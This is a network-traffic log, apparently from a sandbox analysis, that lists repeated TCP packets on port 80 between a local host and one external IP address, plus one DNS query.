Jan 2, 2025 05:18:20.433882952 CET	49989	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:20.433912039 CET	49990	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:20.434029102 CET	49990	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:20.438772917 CET	80	49990	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:20.439260006 CET	80	49990	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:21.116899014 CET	80	49990	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:21.162035942 CET	49990	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:26.131515026 CET	49990	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:26.132267952 CET	49991	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:26.136699915 CET	80	49990	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:26.136774063 CET	49990	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:26.137156963 CET	80	49991	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:26.137217045 CET	49991	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:26.137350082 CET	49991	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:26.147505045 CET	80	49991	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:26.147515059 CET	80	49991	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:26.821595907 CET	80	49991	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:26.865168095 CET	49991	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:27.514247894 CET	80	49987	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:27.514319897 CET	49987	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:27.516639948 CET	80	49991	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:27.516714096 CET	49991	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:31.834419012 CET	49991	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:31.835221052 CET	49992	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:31.839303970 CET	80	49991	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:31.840044975 CET	80	49992	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:31.840128899 CET	49992	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:31.840255022 CET	49992	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:31.845052004 CET	80	49992	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:31.845175982 CET	80	49992	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:32.523602962 CET	80	49992	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:32.568279982 CET	49992	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.098392963 CET	49757	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.098392963 CET	49987	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.099611998 CET	49992	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.102401018 CET	49993	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.104667902 CET	80	49992	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:33.107255936 CET	80	49993	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:33.110532045 CET	49992	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.110537052 CET	49993	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.110641956 CET	49993	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.115403891 CET	80	49993	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:33.804224014 CET	80	49993	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:33.805701017 CET	49994	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.805702925 CET	49993	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.810616970 CET	80	49994	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:33.810807943 CET	80	49993	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:33.813453913 CET	49994	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.813460112 CET	49993	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.813539028 CET	49994	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:33.818331003 CET	80	49994	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:33.818489075 CET	80	49994	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:34.520953894 CET	80	49994	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:34.568286896 CET	49994	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:37.537672997 CET	49994	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:37.542406082 CET	49995	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:37.542917967 CET	80	49994	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:37.545677900 CET	49994	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:37.547221899 CET	80	49995	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:37.547410965 CET	49995	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:37.547410965 CET	49995	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:37.552215099 CET	80	49995	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:37.552373886 CET	80	49995	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:38.231367111 CET	80	49995	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:38.271409035 CET	49995	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:43.242418051 CET	49996	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:43.247472048 CET	80	49996	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:43.247692108 CET	49996	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:43.247786045 CET	49996	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:43.252676964 CET	80	49996	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:43.252687931 CET	80	49996	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:43.971126080 CET	80	49996	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:44.021537066 CET	49996	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:48.990896940 CET	49996	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:48.991708040 CET	49997	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:48.996016979 CET	80	49996	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:48.996125937 CET	49996	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:48.996581078 CET	80	49997	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:48.996645927 CET	49997	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:48.996751070 CET	49997	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:49.001590967 CET	80	49997	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:49.001601934 CET	80	49997	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:49.680490017 CET	80	49997	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:49.880836964 CET	49997	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:54.694226027 CET	49997	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:54.695478916 CET	49998	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:54.699523926 CET	80	49997	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:54.699582100 CET	49997	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:54.700381994 CET	80	49998	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:54.700460911 CET	49998	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:54.700608015 CET	49998	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:18:54.705375910 CET	80	49998	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:54.705503941 CET	80	49998	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:55.375226021 CET	80	49998	141.8.192.151	192.168.2.5
Jan 2, 2025 05:18:55.429694891 CET	49998	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:00.382989883 CET	49998	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:00.385833025 CET	49999	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:00.388227940 CET	80	49998	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:00.388288975 CET	49998	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:00.390743017 CET	80	49999	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:00.390814066 CET	49999	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:00.390961885 CET	49999	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:00.395817041 CET	80	49999	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:00.395920038 CET	80	49999	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:01.070681095 CET	80	49999	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:01.148768902 CET	49999	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:06.084414005 CET	49999	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:06.085462093 CET	50000	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:06.089673042 CET	80	49999	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:06.090338945 CET	80	50000	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:06.090445995 CET	50000	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:06.090451956 CET	49999	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:06.090580940 CET	50000	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:06.095343113 CET	80	50000	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:06.095493078 CET	80	50000	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:06.764190912 CET	80	50000	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:06.819330931 CET	50000	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:08.269165039 CET	80	49995	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:08.269226074 CET	49995	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:11.772573948 CET	50000	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:11.777709961 CET	80	50000	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:11.777741909 CET	50001	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:11.778559923 CET	50000	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:11.782622099 CET	80	50001	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:11.782746077 CET	50001	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:11.782843113 CET	50001	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:11.787575006 CET	80	50001	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:11.787797928 CET	80	50001	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:12.467449903 CET	80	50001	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:12.532505035 CET	50001	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:17.475987911 CET	50001	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:17.475996017 CET	50002	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:17.480900049 CET	80	50002	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:17.481183052 CET	80	50001	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:17.482533932 CET	50001	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:17.482556105 CET	50002	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:17.482655048 CET	50002	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:17.487508059 CET	80	50002	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:17.487623930 CET	80	50002	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:18.167092085 CET	80	50002	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:18.302711964 CET	50002	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:23.178520918 CET	50002	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:23.182145119 CET	50003	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:23.183743954 CET	80	50002	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:23.187011957 CET	80	50003	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:23.187046051 CET	50002	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:23.188725948 CET	50003	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:23.188725948 CET	50003	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:23.193566084 CET	80	50003	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:23.193659067 CET	80	50003	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:23.864540100 CET	80	50003	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:23.944565058 CET	50003	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:28.667292118 CET	80	50003	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:28.667355061 CET	50003	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:28.870651007 CET	50003	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:28.871552944 CET	50004	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:28.875502110 CET	80	50003	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:28.876426935 CET	80	50004	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:28.876497984 CET	50004	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:28.876593113 CET	50004	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:28.881438971 CET	80	50004	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:28.881481886 CET	80	50004	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:29.556889057 CET	80	50004	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:29.646676064 CET	50004	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:34.568869114 CET	50004	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:34.569804907 CET	50005	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:34.574973106 CET	80	50004	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:34.575038910 CET	50004	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:34.575273037 CET	80	50005	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:34.575337887 CET	50005	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:34.575462103 CET	50005	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:34.580261946 CET	80	50005	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:34.580404997 CET	80	50005	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:35.258728027 CET	80	50005	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:35.304754972 CET	50005	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:40.272161961 CET	50005	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:40.273236036 CET	50006	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:40.277216911 CET	80	50005	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:40.277272940 CET	50005	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:40.278064013 CET	80	50006	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:40.278132915 CET	50006	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:40.278254986 CET	50006	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:40.283068895 CET	80	50006	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:40.283174038 CET	80	50006	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:40.994932890 CET	80	50006	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:41.037110090 CET	50006	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:46.008609056 CET	50007	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:46.008611917 CET	50006	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:46.013457060 CET	80	50007	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:46.013612986 CET	80	50006	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:46.016623974 CET	50007	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:46.016624928 CET	50006	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:46.020806074 CET	50007	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:46.025609970 CET	80	50007	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:46.025820971 CET	80	50007	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:46.698717117 CET	80	50007	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:46.740225077 CET	50007	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:51.713660002 CET	50007	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:51.716598988 CET	50008	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:51.719600916 CET	80	50007	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:51.720948935 CET	50007	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:51.723069906 CET	80	50008	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:51.724667072 CET	50008	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:51.728722095 CET	50008	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:51.735100985 CET	80	50008	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:51.735110044 CET	80	50008	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:52.417803049 CET	80	50008	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:52.458988905 CET	50008	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:57.428304911 CET	50008	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:57.429107904 CET	50009	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:57.433409929 CET	80	50008	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:57.433511972 CET	50008	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:57.433917999 CET	80	50009	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:57.436765909 CET	50009	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:57.436964989 CET	50009	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:19:57.441792011 CET	80	50009	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:57.441880941 CET	80	50009	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:58.234035015 CET	80	50009	141.8.192.151	192.168.2.5
Jan 2, 2025 05:19:58.287111998 CET	50009	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:03.241563082 CET	50010	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:03.246535063 CET	80	50010	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:03.246608019 CET	50010	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:03.246721029 CET	50010	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:03.251573086 CET	80	50010	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:03.251624107 CET	80	50010	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:03.934907913 CET	80	50010	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:04.052845955 CET	50010	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:08.944169998 CET	50010	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:08.944966078 CET	50011	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:08.951277971 CET	80	50010	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:08.951351881 CET	50010	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:08.951922894 CET	80	50011	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:08.951989889 CET	50011	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:08.952136040 CET	50011	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:08.959196091 CET	80	50011	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:08.959763050 CET	80	50011	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:09.626683950 CET	80	50011	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:09.626995087 CET	50011	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:09.632150888 CET	80	50011	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:09.634627104 CET	50011	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:14.632574081 CET	50012	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:14.637471914 CET	80	50012	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:14.637541056 CET	50012	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:14.637654066 CET	50012	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:14.642483950 CET	80	50012	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:14.642625093 CET	80	50012	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:15.312179089 CET	80	50012	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:15.368599892 CET	50012	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:20.321343899 CET	50012	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:20.322398901 CET	50013	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:20.327174902 CET	80	50012	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:20.327245951 CET	50012	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:20.327279091 CET	80	50013	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:20.327351093 CET	50013	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:20.328696966 CET	50013	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:20.333872080 CET	80	50013	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:20.333884954 CET	80	50013	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:21.045594931 CET	80	50013	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:21.102829933 CET	50013	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:26.053216934 CET	50013	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:26.056658983 CET	50014	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:26.058249950 CET	80	50013	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:26.060760975 CET	50013	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:26.061507940 CET	80	50014	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:26.064809084 CET	50014	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:26.064923048 CET	50014	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:26.069724083 CET	80	50014	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:26.069828987 CET	80	50014	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:26.739919901 CET	80	50014	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:26.880975962 CET	50014	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:28.241323948 CET	80	50009	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:28.244739056 CET	50009	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:31.756300926 CET	50014	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:31.757056952 CET	50015	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:31.761467934 CET	80	50014	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:31.761703014 CET	50014	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:31.761857033 CET	80	50015	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:31.762007952 CET	50015	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:31.762175083 CET	50015	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:31.766957045 CET	80	50015	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:31.767162085 CET	80	50015	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:32.641308069 CET	80	50015	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:32.693408012 CET	50015	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:33.321157932 CET	80	50015	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:33.321214914 CET	50015	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:37.647686958 CET	50016	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:37.647689104 CET	50015	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:37.652584076 CET	80	50015	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:37.652632952 CET	80	50016	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:37.653152943 CET	50016	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:37.653153896 CET	50016	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:37.658025980 CET	80	50016	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:37.658145905 CET	80	50016	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:38.330703974 CET	80	50016	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:38.380896091 CET	50016	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:43.334649086 CET	50016	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:43.335633993 CET	50017	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:43.339840889 CET	80	50016	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:43.339922905 CET	50016	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:43.340482950 CET	80	50017	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:43.340549946 CET	50017	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:43.340688944 CET	50017	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:43.345396042 CET	80	50017	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:43.345662117 CET	80	50017	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:44.018168926 CET	80	50017	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:44.068521023 CET	50017	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:49.022124052 CET	50017	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:49.023134947 CET	50018	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:49.027232885 CET	80	50017	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:49.027292013 CET	50017	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:49.027985096 CET	80	50018	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:49.028059959 CET	50018	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:49.028161049 CET	50018	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:49.032963991 CET	80	50018	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:49.033056974 CET	80	50018	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:49.704236031 CET	80	50018	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:49.756802082 CET	50018	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:54.709974051 CET	50018	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:54.711282015 CET	50019	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:54.715234041 CET	80	50018	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:54.715306997 CET	50018	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:54.716084957 CET	80	50019	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:54.716160059 CET	50019	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:54.717807055 CET	50019	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:20:54.722625017 CET	80	50019	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:54.722749949 CET	80	50019	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:55.391807079 CET	80	50019	141.8.192.151	192.168.2.5
Jan 2, 2025 05:20:55.443429947 CET	50019	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:21:00.397105932 CET	50019	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:21:00.398108959 CET	50020	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:21:00.402496099 CET	80	50019	141.8.192.151	192.168.2.5
Jan 2, 2025 05:21:00.402549028 CET	50019	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:21:00.403453112 CET	80	50020	141.8.192.151	192.168.2.5
Jan 2, 2025 05:21:00.403523922 CET	50020	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:21:00.403615952 CET	50020	80	192.168.2.5	141.8.192.151
Jan 2, 2025 05:21:00.408854008 CET	80	50020	141.8.192.151	192.168.2.5
Jan 2, 2025 05:21:00.409409046 CET	80	50020	141.8.192.151	192.168.2.5
Jan 2, 2025 05:21:01.080615997 CET	80	50020	141.8.192.151	192.168.2.5
Jan 2, 2025 05:21:01.193423033 CET	50020	80	192.168.2.5	141.8.192.151

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 05:17:05.174551964 CET	51241	53	192.168.2.5	1.1.1.1
